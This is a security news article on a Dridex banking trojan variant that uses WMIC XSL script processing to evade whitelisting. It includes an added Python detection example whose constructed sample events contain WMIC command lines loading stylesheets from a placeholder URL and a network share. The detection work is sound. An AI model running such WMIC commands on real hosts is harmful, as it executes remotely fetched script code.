A new version of the Dridex banker slips past antiviruses

Information security experts have known about the Dridex banking trojan since 2014, and it is still one of the most sophisticated pieces of malware in its category.

Development of this malware continues to this day: new versions of the trojan appear regularly, with major updates released on a recurring basis.

In early June 2019, independent security expert Brad Duncan discovered a new version of Dridex that uses a known Application Whitelisting bypass technique to get around hosts where Windows Script Host is blocked or disabled. In practice, this means that the malware abuses WMI (WMIC) to execute XSL scripts and bypass the defence mechanisms.
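The WMIC abuse described above leaves a recognisable trace in process-creation telemetry: wmic.exe launched with a /format: switch that points at a stylesheet other than the ones that ship in %WINDIR%\System32\wbem (a local path, a UNC share or a URL), frequently with an Office application as the parent. The following is an added detection example written for this article; it is not code from the original page, from Brad Duncan or from eSentire. The event records are constructed Sysmon Event ID 1 style samples, the built-in format list and the Office parent list are assumptions for the example, and the reason strings are this example's own labels.

```python
import re
from typing import Dict, List, Optional

# Stylesheet names that WMIC ships with (list.xsl, csv.xsl, ... in System32\wbem).
# Assumption for this example: a /format: value outside this set deserves a look.
BUILTIN_FORMATS = {
    "list", "csv", "table", "xml", "rawxml", "value", "mof",
    "htable", "hform", "texttablewsys", "textvaluelist",
}
# Parents that should rarely launch WMIC; macro-borne loaders do. Assumed list.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Matches /format:value, /format:"quoted value" or /format:'quoted value'.
FORMAT_RE = re.compile(r"""/format:\s*(?:"([^"]*)"|'([^']*)'|(\S+))""", re.IGNORECASE)

# Constructed sample events (not real Dridex telemetry), reduced to three fields.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /format:"https://example.invalid/ev.xsl"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic process list /format:"C:\Users\Public\s.xsl"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic logicaldisk get caption,size /format:list",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process get name,processid",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic os get /FORMAT:\\fileserver\public\t.xsl",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def format_argument(cmdline: str) -> Optional[str]:
    """The value handed to /format:, or None when the switch is absent."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None).strip()


def classify(event: Dict[str, str]) -> List[str]:
    """Reasons an event looks like WMIC XSL script processing; empty = benign."""
    if basename(event.get("Image", "")) != "wmic.exe":
        return []
    fmt = format_argument(event.get("CommandLine", ""))
    if fmt is None:
        return []
    reasons: List[str] = []
    lowered = fmt.lower()
    stem = basename(lowered)
    if stem.endswith(".xsl"):
        stem = stem[:-4]
    if re.match(r"(https?|ftp)://", lowered) or lowered.startswith("\\\\"):
        reasons.append("stylesheet fetched from a remote location")
    elif any(sep in lowered for sep in ("\\", "/", ":")):
        reasons.append("stylesheet loaded from an explicit local path")
    if stem not in BUILTIN_FORMATS:
        reasons.append(f"non-built-in stylesheet name '{stem}'")
    if basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        reasons.append("WMIC spawned by an Office application")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch and keep only the flagged events."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append({"index": i, "CommandLine": ev["CommandLine"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"[{hit['index']}] {hit['CommandLine']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

The rule deliberately keys on behaviour (which process ran, what it was told to load, who launched it) rather than on the DLL names or hashes, which the next section explains change on every logon. A plain `/format:list` from cmd.exe is left alone so the rule does not fire on routine administration.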


“Of note, the Dridex DLL files are 64-bit DLLs using file names that are loaded by legitimate Microsoft Windows system EXEs. These file paths, file names, and associated SHA256 hashes change every time the victim logs onto the infected Windows host”, — reported Brad Duncan.

A more detailed report on the new version of the trojan has now been released by experts at eSentire. The researchers write that when a sample was first uploaded to VirusTotal, only 6 of 60 protective solutions "detected" Dridex as malware. As of July 2, 2019, the number of detections had risen to 46 of 60.

Analysts at eSentire write that the new variation of Dridex is distributed through spam emails with malicious attachments. These documents contain malicious macros that can be triggered by various interactions with the victim (it all depends on the specific system environment).

“The malware targets banking information on the victim system. Over the last decade, Dridex underwent a series of feature augmentation, including a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption”, — reported eSentire specialists.

The experts warn that many antivirus solutions may detect suspicious behaviour from Dridex but will not be able to accurately determine what the problem is. Given the constant changes in the trojan's infrastructure, signature-based antivirus software may be useless against Dridex.

Recommendations:

Given email as the initial access point, employees are the first line of defense against this threat. Expect financial departments to be targeted by unsolicited invoices carrying malicious macros within.

Polina Lisovskaya
